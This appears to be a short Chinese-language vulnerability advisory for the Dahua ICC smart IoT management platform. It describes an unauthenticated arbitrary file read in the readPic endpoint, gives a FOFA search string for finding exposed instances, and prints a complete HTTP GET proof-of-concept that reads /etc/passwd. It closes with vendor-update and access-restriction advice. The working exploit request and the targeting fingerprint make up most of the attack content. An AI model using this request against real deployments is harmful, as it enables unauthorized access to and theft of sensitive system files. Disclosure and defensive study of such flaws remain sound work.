0x01 产品简介
大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。
0x02 漏洞概述
大华ICC智能物联综合管理平台 readpic接口处存在任意文件读取漏洞,未经身份验证的攻击者 可以获取系统内部敏感文件信息,使系统处于极不安全的状态。
0x03 复现环境
FOFA:body="客户端会小于800"
0x04 漏洞复现
PoC
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
0x05 修复建议
目前已提供解决方案,请关注厂商主页更新:https://www.dahuatech.com/
临时修复方案:
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统。